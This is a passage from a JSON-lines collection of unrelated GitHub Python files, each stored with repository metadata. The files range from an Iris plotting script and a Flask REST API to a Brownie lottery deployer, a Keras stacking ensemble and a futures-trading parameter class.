Data\nprint(dataset.shape)\nprint(dataset.head(30))\nprint(dataset.describe())\nprint(dataset.groupby('class').size())\n\n# Box and Whisker plot\ndataset.plot(kind='box')\npyplot.show()\n\n# Histogram\ndataset.hist(bins = 20)\npyplot.show()\n\n# Scatter Matrix / Pairplot\npairplot(dataset, hue = 'class')\npyplot.show()\n\n\n\n\n\n\n\n\n\n","repo_name":"DominicFox/Iris-Dataset-First-ML-Project","sub_path":"IrisDatasetVisualisation.py","file_name":"IrisDatasetVisualisation.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"18963172704","text":"import requests\nimport os\n\nos.system(\"cls\")\nurl = \"http://www.e-happy.com.tw\"\nhtml = requests.get(url)\nhtml.encoding = \"utf-8\"\nhtmllist = html.text.splitlines()\ni = 0\nfor row in htmllist:\n print(i, row)\n i = i+1\n if i > 10:\n break\n","repo_name":"paicheng/python_beginner_course","sub_path":"ch5/ch5.2/ch5.2.1_requests.py","file_name":"ch5.2.1_requests.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"19366252953","text":"from django.contrib import admin\nfrom blog.models import Comment\n\n# Register your models here.\n\n\nfrom blog.models import Post\n\n\nclass PostAdmin(admin.ModelAdmin):\n list_display = [\"title\"]\n\n\nclass CommentAdmin(admin.ModelAdmin):\n def post_name(self, instance):\n return instance.post.title\n\n list_display = [\"author\", \"post_name\"]\n search_fields = [\"post_name\"]\n\n\nadmin.site.register(Post, PostAdmin)\nadmin.site.register(Comment,CommentAdmin)","repo_name":"thecount12/rapidpythonprogramming","sub_path":"chapter13/fooblah/blog/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"6"} +{"seq_id":"43137484471","text":"import sqlite3\nfrom imdb import IMDb\n\n\ndef get_imdb_movie(db, title, year):\n if type(db) == str:\n con = sqlite3.connect(db)\n else:\n con = db\n cur = con.cursor()\n cur.execute('''select id from movies\n where movie=? and year=?''', (title, year))\n result = cur.fetchall()\n if len(result) == 0:\n ia = IMDb()\n search = ia.search_movie(' '.join((title, year)))\n if len(search) > 0:\n print('Movie to search for: {} ({})'.format(title, year))\n for i,m in enumerate(search):\n t = m['title'] if 'title' in m.keys() else None\n y = m['year'] if 'year' in m.keys() else None\n print('({}) {} ({})'.format(i+1, t, y))\n num = input('Which movie did you watch (0 for none of these)? ')\n try:\n n = int(num)\n except:\n n = 0\n if n>0:\n # Get the IMDB id number\n movie = search[n-1]\n idnum = movie.getID()\n else:\n idnum = input('Enter idnum manually: ')\n movie = ia.get_movie(idnum)\n\n t = movie['title'] if 'title' in movie.keys() else title\n y = movie['year'] if 'year' in movie.keys() else year\n\n # Add movie into movies\n cur.execute('''insert into movies(id, movie, year)\n values (?, ?, ?)''', (idnum, t, y))\n con.commit()\n else:\n print('No possible movies found')\n\n # Need to choose a random, negative id number\n from numpy.random import randint\n cur.execute('select id from movies')\n ids_temp = cur.fetchall()\n all_ids = [i[0] for i in ids_temp]\n\n idnum = all_ids[0]\n while idnum in all_ids:\n idnum = randint(-100000, -1)\n idnum, movie = -1, {'title':title, 'year':year}\n elif len(result) == 1:\n idnum = result[0][0]\n else:\n assert 0, 'Movie in database is duplicated.'\n\n if type(db) == str:\n con.close()\n return idnum, movie\n","repo_name":"mburger-stsci/movieganizer","sub_path":"get_imdb_movie.py","file_name":"get_imdb_movie.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"39067864127","text":"from brownie import Lottery, accounts, network, config\nfrom scripts.helpful_scripts import get_account, get_contract, fund_with_link\nimport time\n\n\ndef deploy_lottery():\n # account = get_account(id=\"freecodecamp-account\")\n account = get_account()\n\n # check the constructor to get all the needed parameters\n lottery = Lottery.deploy(\n get_contract(\"eth_usd_price_feed\").address,\n get_contract(\"vrf_coordinator\").address,\n get_contract(\"link_token\").address,\n config[\"networks\"][network.show_active()][\"fee\"],\n config[\"networks\"][network.show_active()][\"keyhash\"],\n {\"from\": account},\n # verify is set to default = False\n publish_source=config[\"networks\"][network.show_active()].get(\"verify\", False),\n )\n print(\"Deployed Lottery !\")\n return lottery\n\n\ndef start_lottery():\n account = get_account()\n lottery = Lottery[-1]\n starting_tx = lottery.startLottery({\"from\": account})\n starting_tx.wait(1)\n print(\"Lottery started!\")\n\n\ndef enter_lottery():\n account = get_account()\n lottery = Lottery[-1]\n # just add a little something to be sure it's above entrance fee\n value = lottery.getEntranceFee() + 100000000\n tx = lottery.enter({\"from\": account, \"value\": value})\n tx.wait(1)\n print(\"You entered the lottery!\")\n\n\ndef end_lottery():\n account = get_account()\n lottery = Lottery[-1]\n # fund the contract\n # then end the lottery\n tx = fund_with_link(lottery.address)\n tx.wait(1)\n ending_transaction = lottery.endLottery({\"from\": account})\n # ici il y a une différence car il FAUT attendre que le node chainlink réponde et fasse\n # la transaction, il est donc impératif d'attendre au moins quelques blocs pour que la\n # transaction soit effectuée par le node chainlink et enregistrée dans la blockchain\n ending_transaction.wait(1)\n # on attend 180 secondes, ce qui doit être suffisant pour que le transaction soit effectuée\n # dans la vidéo c'est 60 secondes, mais ça n'est pas assez :\n # time.sleep(60)\n time.sleep(180)\n print(f\"{lottery.recentWinner()} is the new winner!\")\n\n\ndef main():\n deploy_lottery()\n start_lottery()\n enter_lottery()\n end_lottery()\n","repo_name":"micha1805/smartcontractLottery","sub_path":"scripts/deploy_lottery.py","file_name":"deploy_lottery.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"30122833957","text":"from Deck.Button import Button\nfrom Deck.Module import Module\n\nfrom Messages.OBS import *\n\nclass SceneSwitcher(Module):\n def __init__(self, timestamp_manager):\n super().__init__(bg_color = \"#111111\")\n self._timestamp_manager = timestamp_manager\n \n self._sbs = False\n \n bg = \"#440000\"\n self.set_button(0, 0, SceneSwitchButton(self, \"Start\", \"Screen Start\", bg))\n self.set_button(0, 1, SceneSwitchButton(self, \"Break\", \"Screen Break\", bg))\n self.set_button(0, 2, SceneSwitchButton(self, \"End\", \"Screen End\", bg))\n \n bg = \"#004400\"\n self.set_button(1, 0, SceneSwitchButton(self, \"Cam\", \"Cam A\", bg))\n self.set_button(1, 1, SceneSwitchButton(self, \"Cam+\\nGame\", \"Cam A + Game A\", bg))\n self.set_button(1, 2, SceneSwitchButton(self, \"Room\\nCam\", \"Cam Room\", bg))\n \n bg = \"#000044\"\n self.set_button(2, 0, SceneSwitchButton(self, \"Game\\n+Cam\", \"Game A + Cam A\", bg, True))\n self.set_button(2, 1, SceneSwitchButton(self, \"Game\", \"Game A\", bg, True))\n self.set_button(2, 2, SceneSwitchButton(self, \"Game\\nonly\", \"Game A only\", bg))\n \n #self.set_button(3, 2, SBSToggleButton(self))\n self.set_button(3, 2, ABToggleButton(self))\n\nclass SceneSwitchButton(Button):\n def __init__(self, module, display_name, scene_name, bg_color, has_sbs_variant = False):\n super().__init__(text = display_name, bg_color = bg_color)\n self._module = module\n self._scene_name = scene_name\n self._has_sbs_variant = has_sbs_variant\n self._scene_selected = False\n \n def border_size(self):\n return 10 if self._scene_selected else 0\n \n def pressed(self):\n scene_name = self._scene_name\n if self._module._sbs and self._has_sbs_variant:\n scene_name = scene_name + \" SBS\"\n self.send_to_backend(SwitchSceneCommand(scene_name))\n self._module._timestamp_manager.mark_all(scene_name)\n \n def recv(self, msg):\n if isinstance(msg, SwitchSceneCommand):\n self._scene_selected = msg.scene_name == self._scene_name\n self.set_dirty()\n\nclass SBSToggleButton(Button):\n def __init__(self, module):\n super().__init__()\n self._module = module\n \n def text(self):\n if self._module._sbs:\n return \"SBS is\\non\"\n else:\n return \"SBS is\\noff\"\n \n def fg_color(self):\n if self._module._sbs:\n return \"#00AA00\"\n else:\n return \"#0000EE\"\n \n def pressed(self):\n self._module._sbs = not self._module._sbs\n\nclass ABToggleButton(Button):\n def __init__(self, module):\n super().__init__()\n self._module = module\n \n def text(self):\n return \"A/B\"\n \n def pressed(self):\n self.send_to_backend(SwitchABCommand())\n","repo_name":"OchiZockt/OZ-StreamDeck","sub_path":"Modules/SceneSwitcher.py","file_name":"SceneSwitcher.py","file_ext":"py","file_size_in_byte":2933,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"14276216121","text":"from flask import Flask, request, jsonify\nfrom flask_restful import Resource, Api, reqparse\nfrom clases.materiales.materiales import materiales, get_material, eliminar_material, modificar_material, get_all\nfrom middlewares.middlewares import authentication\nimport psycopg2\nfrom errors import errorHandling\n\nclass Materiales(Resource):\n def options(self):\n pass\n def post(self):\n token = request.headers.get(\"authentication\")\n user = authentication(token)\n if user:\n info = request.get_json(force=True)\n id = info[\"id\"]\n nombre = info[\"nombre\"]\n costo_unitario = info[\"costo\"]\n material = materiales(id,nombre,costo_unitario)\n material = material.save()\n if isinstance(material, tuple):\n return {\"mensaje\": errorHandling(material[1], material[2])},501 \n return {\"mensaje\": \"exito al guardar material\"},201\n else:\n return {\"mensaje\": \"error, necesita autenticarse\"},401\n def get(self):\n token = request.headers.get(\"authentication\")\n user = authentication(token)\n if user:\n data = get_all()\n if (data[0]) == False:\n return {\"mensaje\": errorHandling(data[1], data[2])},501 \n return {\"materiales\":data},200\n else:\n return {\"mensaje\": \"error, necesita autenticarse\"},401\n\nclass MaterialesParametro(Resource):\n def options(self):\n pass\n def put(self, id):\n token = request.headers.get(\"authentication\")\n user = authentication(token)\n if user:\n info = request.get_json(force = True)\n nombre = info[\"nombre\"]\n costo_unitario = info[\"costo_unitario\"]\n material = modificar_material(id,nombre,costo_unitario)\n if isinstance(material, tuple):\n return {\"mensaje\": errorHandling(material[1], material[2])},501 \n return {\"mensaje\":\"material modificado correctamente\"}\n else:\n return {\"mensaje\": \"error se necesita estar autenticado\"},400\n \n def get(self,id):\n token = request.headers.get(\"authentication\")\n user = authentication(token)\n if user:\n data = get_material(id)\n if isinstance(data,tuple):\n return {\"mensaje\": errorHandling(data[1], data[2])},501 \n else:\n return {\"material\":data},201\n else:\n return {\"mensaje\": \"error se necesita estar autenticado\"},400\n\n def delete(self,id):\n token = request.headers.get(\"authentication\")\n user = authentication(token)\n permission = user[\"permission\"]\n if user and permission == 'ADMIN':\n data = eliminar_material(id)\n if isinstance(data,tuple):\n return {\"mensaje\": errorHandling(data[1], data[2])},501 \n return {\"mensaje\":\"material eliminado\"}\n else:\n return {\"mensaje\": \"error se necesita estar autenticado\"},400\n ","repo_name":"JaredJHZ/workreports_backend","sub_path":"controllers/materiales.py","file_name":"materiales.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"17649521847","text":"# deploying model on Roboflow\n\nproject.version(dataset.version).deploy(model_type=\"yolov8\", model_path=f\"{HOME}/runs/detect/train/\")\n\n#Run inference on your model on a persistant, auto-scaling, cloud API\n\n#load model\nmodel = project.version(dataset.version).model\n\n#choose random test set image\nimport os, random\ntest_set_loc = dataset.location + \"/test/images/\"\nrandom_test_image = random.choice(os.listdir(test_set_loc))\nprint(\"running inference on \" + random_test_image)\n\npred = model.predict(test_set_loc + random_test_image, confidence=40, overlap=30).json()\npred\n","repo_name":"Abhisri25/YOLOv8-Licence-Plate-Detection","sub_path":"Deploy.py","file_name":"Deploy.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"4769293557","text":"#!/bin/env python3\nimport cv2\nimport numpy as np\nfrom time import time, gmtime, strftime\nimport os\n\nsuffix = 'Coquitlam Dam.mp4'\ninterval = 3600 # In seconds\nfps = 25\nsave_folder = 'save'\n\ncodec = cv2.VideoWriter_fourcc(*'mp4v')\n\ncap = cv2.VideoCapture('rtsp://11.0.0.106/av0_0')\n\n# Check if camera opened successfully\nif (cap.isOpened()== False):\n print(\"Error opening video stream or file\")\n\n\nstart = time()\ntimme = strftime(\"%m-%d-%Y %H-%M-%S\", gmtime())\nfilename = os.path.join(save_folder, f\"{timme} {suffix}\")\nv_out = cv2.VideoWriter(filename, codec, fps, \n (int(cap.get(cv2.CAP_PROP_FRAME_WIDTH)), int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))))\nprint(f\"Recording to {filename}\")\n\n# Read until video is completed\nwhile(cap.isOpened()):\n # Capture frame-by-frame\n ret, frame = cap.read()\n if ret == True:\n\n # Display the resulting frame\n #cv2.imshow('Frame',frame)\n\n now = time()\n if now - start > interval:\n start = now\n timme = strftime(\"%m-%d-%Y %H-%M-%S\", gmtime())\n filename = os.path.join(save_folder, f\"{timme} {suffix}\")\n v_out.release()\n v_out = cv2.VideoWriter(filename, codec, fps, \n (int(cap.get(cv2.CAP_PROP_FRAME_WIDTH)), int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))))\n print(f\"Recording to {filename}\")\n\n v_out.write(frame)\n\n # Press Q on keyboard to exit\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n # Break the loop\n else:\n break\n\n# When everything done, release the video capture object\ncap.release()\n\n# Closes all the frames\ncv2.destroyAllWindows()\n","repo_name":"Salmon-Computer-Vision/salmon-computer-vision","sub_path":"utils/cam.py","file_name":"cam.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"6"} +{"seq_id":"36396567745","text":"\"\"\"\nComputes continuous value metrics given an agreement map.\n\"\"\"\n\n# __all__ = ['*']\n__author__ = \"Fernando Aristizabal\"\n\nfrom typing import Iterable, Union, List\n\nimport numpy as np\nimport pandera as pa\nimport pandas as pd\nfrom pandera.typing import DataFrame\nimport xarray as xr\nimport geopandas as gpd\nimport dask as da\n\nfrom gval import ContStats\nfrom gval.utils.schemas import Metrics_df, Subsample_identifiers, Sample_identifiers\nfrom gval.utils.loading_datasets import _check_dask_array, _convert_to_dataset\n\n\ndef _get_selected_datasets(\n agreement: xr.Dataset,\n candidate: xr.Dataset,\n benchmark: xr.Dataset,\n nodata: list,\n var_name: str,\n) -> List[xr.Dataset]:\n \"\"\"\n Selects specific coordinates for integer valued datasets to not process nodata values\n\n Parameters\n ----------\n agreement : xr.Dataset\n Agreement Map\n candidate : xr.Dataset\n Candidate Map\n benchmark : xr.Dataset\n Benchmark Map\n nodata : list\n Nodata values in the list\n var_name : str\n Name of variable\n\n Returns\n -------\n List[xr.Dataset, xr.Dataset, xr.Dataset]\n Datasets with selected coordinates\n \"\"\"\n\n is_dsk = _check_dask_array(agreement)\n cmask, bmask = (\n xr.where(candidate[var_name] == nodata, 0, 1),\n xr.where(benchmark[var_name] == nodata, 0, 1),\n )\n tmask = cmask & bmask\n\n # Create a coord meshgrid and select appropriate coords to select from xarray\n if is_dsk:\n with da.config.set({\"array.slicing.split_large_chunks\": True}):\n grid_coords = da.array.asarray(\n da.array.meshgrid(candidate.coords[\"x\"], candidate.coords[\"y\"])\n ).T.reshape(-1, 2)\n picked_coords = grid_coords[da.array.ravel(tmask.data).astype(bool), :]\n else:\n grid_coords = np.array(\n np.meshgrid(candidate.coords[\"x\"], candidate.coords[\"y\"])\n ).T.reshape(-1, 2)\n picked_coords = grid_coords[np.ravel(tmask.data).astype(bool), :]\n\n # Select coordinates from xarray\n with da.config.set({\"array.slicing.split_large_chunks\": True}):\n agreement_sel = (\n agreement[var_name].sel(\n {\"x\": picked_coords[:, 0], \"y\": picked_coords[:, 1]}\n )\n if picked_coords is not None\n else agreement[var_name]\n )\n\n candidate_sel = (\n candidate[var_name].sel(\n {\"x\": picked_coords[:, 0], \"y\": picked_coords[:, 1]}\n )\n if picked_coords is not None\n else candidate[var_name]\n )\n\n benchmark_sel = (\n benchmark[var_name].sel(\n {\"x\": picked_coords[:, 0], \"y\": picked_coords[:, 1]}\n )\n if picked_coords is not None\n else benchmark[var_name]\n )\n\n return (\n agreement_sel,\n candidate_sel,\n benchmark_sel,\n )\n\n\n@pa.check_types\ndef _compute_continuous_metrics(\n agreement_map: Union[xr.DataArray, xr.Dataset],\n candidate_map: Union[xr.DataArray, xr.Dataset],\n benchmark_map: Union[xr.DataArray, xr.Dataset],\n metrics: Union[str, Iterable[str]] = \"all\",\n subsampling_average: str = \"micro\",\n subsampling_df: gpd.GeoDataFrame = None,\n) -> DataFrame[Metrics_df]:\n \"\"\"\n Computes continuous metrics.\n\n Parameters\n ----------\n agreement_map : Union[xr.DataArray, xr.Dataset, List[Union[xr.DataArray, xr.Dataset]]]\n Agreement map, error based (candidate - benchmark).\n candidate_map : Union[xr.DataArray, xr.Dataset]\n Candidate map.\n benchmark_map : Union[xr.DataArray, xr.Dataset]\n Benchmark map.\n metrics : Union[str, Iterable[str]], default = \"all\"\n String or list of strings representing metrics to compute.\n subsampling_average : str, default = \"micro\"\n Strategy to average samples if there is more than one in the agreement map\n subsampling_df : gpd.GeoDataFrame, default = None\n DataFrame with geometries to subsample or use as exclusionary masks and optional sample weights\n\n Returns\n -------\n DataFrame[Metrics_df]\n Metrics DF with computed metrics per sample.\n\n Raises\n ------\n ValueError\n If metrics is not a string or list of strings.\n\n References\n ----------\n .. [1] `7th International Verification Methods Workshop `_\n .. [2] `3.3. Metrics and scoring: quantifying the quality of predictions `_\n \"\"\"\n\n if not isinstance(agreement_map, list):\n agreement_map = [agreement_map]\n candidate_map = [candidate_map]\n benchmark_map = [benchmark_map]\n\n metric_dfs = []\n for idx, (agreement, benchmark, candidate) in enumerate(\n zip(agreement_map, benchmark_map, candidate_map)\n ):\n # Change data to Dataset if DataArray\n agreement = _convert_to_dataset(agreement)\n candidate = _convert_to_dataset(candidate)\n benchmark = _convert_to_dataset(benchmark)\n\n # Check if integer type and nodata values\n is_int = (\n np.issubdtype(candidate.dtype, np.integer)\n if isinstance(candidate, xr.DataArray)\n else np.issubdtype(candidate[\"band_1\"].dtype, np.integer)\n )\n nodata = [agreement[x].rio.nodata for x in agreement.data_vars]\n\n # Remove no data value if int type form calculation, otherwise leave all values in\n # Necessary because there is not an int sentinel value\n if is_int and np.all([x is not None for x in nodata]):\n final_stats = []\n # Iterate through each band and gather statistics\n for nodata_idx, var_name in enumerate(agreement.data_vars):\n # Create mask for all nodata values\n agreement_sel, candidate_sel, benchmark_sel = _get_selected_datasets(\n agreement, candidate, benchmark, nodata[nodata_idx], var_name\n )\n\n statistics, names = ContStats.process_statistics(\n metrics,\n error=agreement_sel,\n candidate_map=candidate_sel,\n benchmark_map=benchmark_sel,\n )\n\n del agreement_sel, candidate_sel, benchmark_sel\n\n final_stats.append(statistics)\n\n statistics = [\n {f\"band_{idx + 1}\": val for idx, val in enumerate(lst)}\n for lst in np.array(final_stats).T\n ]\n\n else:\n statistics, names = ContStats.process_statistics(\n metrics,\n error=agreement,\n candidate_map=candidate,\n benchmark_map=benchmark,\n )\n\n # create metrics_df\n metric_df = dict()\n for name, stat in zip(names, statistics):\n metric_df[name] = stat\n\n def is_nested_dict(d):\n # if not isinstance(d, dict):\n # return False\n return any(isinstance(v, dict) for v in d.values())\n\n if is_nested_dict(metric_df):\n metric_df = pd.DataFrame.from_dict(metric_df, orient=\"index\").transpose()\n metric_df.reset_index(inplace=True)\n metric_df.rename(columns={\"index\": \"band\"}, inplace=True)\n metric_df[\"band\"] = metric_df[\"band\"].str.replace(\"band_\", \"\")\n\n else:\n # dataarray\n metric_df = pd.DataFrame(metric_df, index=[0])\n\n # add band\n metric_df.insert(0, \"band\", \"1\")\n\n if subsampling_df is not None:\n metric_df.insert(0, \"subsample\", f\"{idx + 1}\")\n\n metric_dfs.append(metric_df)\n\n metric_df = pd.concat(metric_dfs).reset_index().drop(columns=[\"index\"])\n\n if subsampling_df is not None:\n if subsampling_average == \"band\":\n metric_df = (\n metric_df.groupby(Subsample_identifiers.columns())\n .mean(numeric_only=True)\n .reset_index()\n )\n\n metric_df.insert(1, \"band\", \"averaged\")\n\n if subsampling_average == \"subsample\":\n metric_df = (\n metric_df.groupby(Sample_identifiers.columns())\n .mean(numeric_only=True)\n .reset_index()\n )\n\n metric_df.insert(0, \"subsample\", \"averaged\")\n\n if subsampling_average == \"weighted\":\n if subsampling_df.get(\"weights\") is None:\n raise ValueError(\n \"Must have weights if weighted is chosen for subsampling\"\n ) # pragma: no cover\n\n metric_df.loc[:, \"weights\"] = subsampling_df[\"weights\"]\n\n # compute weighted average\n weighted_metrics = (\n metric_df.loc[:, metrics]\n .multiply(metric_df.loc[:, \"weights\"], axis=0)\n .reset_index(drop=True)\n )\n\n # add weighted metrics to metric_df\n metric_df.loc[:, metrics] = weighted_metrics\n\n # take average of weighted metrics\n metric_df = (\n metric_df.groupby(Sample_identifiers.columns())\n .sum(numeric_only=True)\n .drop(\n columns=[\"weights\", \"subsample\"],\n errors=\"ignore\",\n )\n .divide(metric_df.loc[:, \"weights\"].sum())\n .reset_index()\n )\n\n metric_df.insert(0, \"subsample\", \"averaged\")\n\n return metric_df\n","repo_name":"NOAA-OWP/gval","sub_path":"src/gval/comparison/compute_continuous_metrics.py","file_name":"compute_continuous_metrics.py","file_ext":"py","file_size_in_byte":9524,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"6"} +{"seq_id":"27528355861","text":"from django import forms\nfrom .models import Attendant, EventDetail\n\n\nclass AttendantCreateForm(forms.ModelForm):\n class Meta:\n model = Attendant\n fields = ('day', 'name', 'level', 'phone_number',\n 'visitor', 'department', 'email', 'sex')\n\n def __init__(self, *args, **kwargs):\n super(AttendantCreateForm, self).__init__(*args, **kwargs)\n self.fields['day'].widget.attrs['placeholder'] = 'day'\n self.fields['day'].help_text = 'select the day of the event'\n self.fields['day'].label = ''\n\n self.fields['name'].help_text = 'Enter Your Full Name'\n self.fields['name'].widget.attrs['placeholder'] = 'your name'\n self.fields['name'].label = ''\n\n\n self.fields['level'].help_text = 'What level are you?'\n self.fields['level'].widget.attrs['placeholder'] = 'level'\n self.fields['level'].label = ''\n\n\n self.fields['phone_number'].help_text = 'Enter your Mobile Number: 08103304043'\n self.fields['phone_number'].widget.attrs['placeholder'] = 'Your Mobile Number'\n self.fields['phone_number'].label = ''\n\n\n self.fields['visitor'].help_text = 'Select if you are visitor from the drop down'\n self.fields['visitor'].label = ''\n\n\n self.fields['department'].help_text = 'What department are you?'\n self.fields['department'].widget.attrs['placeholder'] = 'your department'\n self.fields['department'].label = ''\n\n\n self.fields['email'].help_text = 'Your Email Address.'\n self.fields['email'].widget.attrs['placeholder'] = 'Your E-mail Address'\n self.fields['email'].label = ''\n\n self.fields['sex'].help_text = 'Select your Sex Male | Female.'\n self.fields['sex'].label = ''\n\n\n\nclass EventCreateForm(forms.ModelForm):\n def __init__(self, *args, **kwargs):\n super(EventCreateForm, self).__init__(*args, **kwargs)\n # self.fields['date'].disabled = True\n self.fields['date'].label = ''\n self.fields['date'].help_text = 'The date is generated Automatically (YYYY-MM-DD). '\n\n self.fields['event_name'].help_text = 'Enter the name of the event... '\n self.fields['event_name'].widget.attrs['placeholder'] = 'name of the event...'\n self.fields['event_name'].label = ''\n class Meta:\n model = EventDetail\n exclude = ['year', 'slug']\n","repo_name":"Afeez1131/MSSNEvent-app","sub_path":"event_app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"31282154083","text":"\"\"\" Functions to deal with big Query\"\"\"\nimport pandas as pd\n\nPROJECT_ID = \"data-analytics-platform-206914\"\n\n\ndef read_bq_data(query):\n \"\"\"Read a table from BQ\"\"\"\n result_df = pd.read_gbq(\n query=query,\n project_id=PROJECT_ID,\n # private_key=GOOGLE_CREDENTIALS,\n dialect=\"standard\",\n )\n return result_df\n","repo_name":"chechir/doors","sub_path":"doors/bq.py","file_name":"bq.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"8190790589","text":"# stacked generalization with neural net meta model on blobs dataset\nfrom sklearn.datasets import make_blobs\nfrom sklearn.metrics import accuracy_score\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.utils import plot_model\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import Input\nfrom tensorflow.keras.layers import Dense\nfrom keras.layers.merge import concatenate\nfrom numpy import argmax\n\n# When using neural networks as sub-models, it may be desirable to use\n# a neural network as a meta-learner.\n\n\n\n# load models from file\ndef load_all_models(n_models):\n all_models = list()\n for i in range(n_models):\n # define filename for this ensemble\n filename = 'models/model_' + str(i + 1) + '.h5'\n # load model from file\n model = load_model(filename)\n # add to list of members\n all_models.append(model)\n print('>loaded %s' % filename)\n return all_models\n\n# Once the sub-models have been prepared, we can define the stacking ensemble model.\n#\n# The input layer for each of the sub-models will be used as a separate input\n# head to this new model. This means that k copies of any input data will have to\n# be provided to the model, where k is the number of input models, in this case, 5.\n#\n# The outputs of each of the models can then be merged. In this case, we will use a\n# simple concatenation merge, where a single 15-element vector will be created from the\n# three class-probabilities predicted by each of the 5 models.\n#\n# We will then define a hidden layer to interpret this “input” to the meta-learner and an\n# output layer that will make its own probabilistic prediction. The define_stacked_model()\n# function below implements this and will return a stacked generalization neural network model\n# given a list of trained sub-models.\n\n# define stacked model from multiple member input models\ndef define_stacked_model(members):\n # update all layers in all models to not be trainable\n for i in range(len(members)):\n model = members[i]\n for layer in model.layers:\n # make not trainable\n layer.trainable = False\n # rename to avoid 'unique layer name' issue\n layer._name = 'ensemble_' + str(i + 1) + '_' + layer.name\n # define multi-headed input\n ensemble_visible = [model.input for model in members]\n # concatenate merge output from each model\n ensemble_outputs = [model.output for model in members]\n merge = concatenate(ensemble_outputs)\n hidden = Dense(10, activation='relu')(merge)\n output = Dense(3, activation='softmax')(hidden)\n model = Model(inputs=ensemble_visible, outputs=output)\n # plot graph of ensemble\n # Visualization of Stacked Generalization Ensemble of Neural Network Models\n plot_model(model, show_shapes=True, to_file='model_graph.png')\n # compile\n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n return model\n\n\n# fit a stacked model\ndef fit_stacked_model(model, inputX, inputy):\n # prepare input data\n X = [inputX for _ in range(len(model.input))]\n # encode output data\n inputy_enc = to_categorical(inputy)\n # fit model\n model.fit(X, inputy_enc, epochs=300, verbose=0)\n\n\n# make a prediction with a stacked model\ndef predict_stacked_model(model, inputX):\n # prepare input data\n X = [inputX for _ in range(len(model.input))]\n # make prediction\n return model.predict(X, verbose=0)\n\n\n# generate 2d classification dataset\nX, y = make_blobs(n_samples=1100, centers=3, n_features=2, cluster_std=2, random_state=2)\n# split into train and test\nn_train = 100\ntrainX, testX = X[:n_train, :], X[n_train:, :]\ntrainy, testy = y[:n_train], y[n_train:]\nprint(trainX.shape, testX.shape)\n# load all models\nn_members = 5\nmembers = load_all_models(n_members)\nprint('Loaded %d models' % len(members))\n# define ensemble model\nstacked_model = define_stacked_model(members)\n# fit stacked model on test dataset\nfit_stacked_model(stacked_model, testX, testy)\n# make predictions and evaluate\nyhat = predict_stacked_model(stacked_model, testX)\nyhat = argmax(yhat, axis=1)\nacc = accuracy_score(testy, yhat)\nprint('Stacked Test Accuracy: %.3f' % acc)\n","repo_name":"aghorab/Ensemble_Learning_Ghorab_Project","sub_path":"stacked_for_multiclass_classification_with_nn_meta_learner_7.py","file_name":"stacked_for_multiclass_classification_with_nn_meta_learner_7.py","file_ext":"py","file_size_in_byte":4275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"16463815651","text":"import random\nimport statistics\nimport time\n\nclass Params:\n def __init__(self):\n self.m = None\n self.set_options_and_defaults()\n\n self.id = -2 # negative ids for maintaining code default versions\n self.results = []\n self.last_result = None # temp variable to store last result, will be appended to results when stored\n\n\n def assign_monitor(self, monitor):\n self.m = monitor\n self.set_basic_parameters()\n\n\n def set_basic_parameters(self):\n if self.m.ticker_code() == \"ES\":\n self.tick_price = 0.25\n self.price_precision = 2\n self.dollar_multiplier = 50\n \n elif self.m.ticker_code() == \"NQ\":\n self.tick_price = 0.25\n self.price_precision = 2\n self.dollar_multiplier = 20\n \n elif self.m.ticker_code() == \"YM\":\n self.tick_price = 1\n self.price_precision = 2\n self.dollar_multiplier = 20\n \n elif self.m.ticker_code() == \"CL\":\n self.tick_price = 0.01\n self.price_precision = 2\n self.dollar_multiplier = 1000\n \n elif self.m.ticker_code() == \"NG\":\n self.tick_price = 0.001\n self.price_precision = 3\n self.dollar_multiplier = 10000\n \n elif self.m.ticker_code() == \"GC\":\n self.tick_price = 0.10\n self.price_precision = 2\n self.dollar_multiplier = 100\n \n elif self.m.ticker_code() == \"HG\":\n self.tick_price = 0.0005\n self.price_precision = 4\n self.dollar_multiplier = 5000\n \n elif self.m.ticker_code() == \"SI\":\n self.tick_price = 0.005\n self.price_precision = 3\n self.dollar_multiplier = 5000\n \n elif self.m.ticker_code() == \"EU\":\n self.tick_price = 0.00005\n self.price_precision = 5\n self.dollar_multiplier = 125000\n \n elif self.m.ticker_code() == \"JP\":\n self.tick_price = 0.0000005\n self.price_precision = 7\n self.dollar_multiplier = 12500000\n \n elif self.m.ticker_code() == \"ZB\":\n self.tick_price = 0.03125\n self.price_precision = 5\n self.dollar_multiplier = 1000\n \n elif self.m.ticker_code() == \"ZN\":\n self.tick_price = 0.015625\n 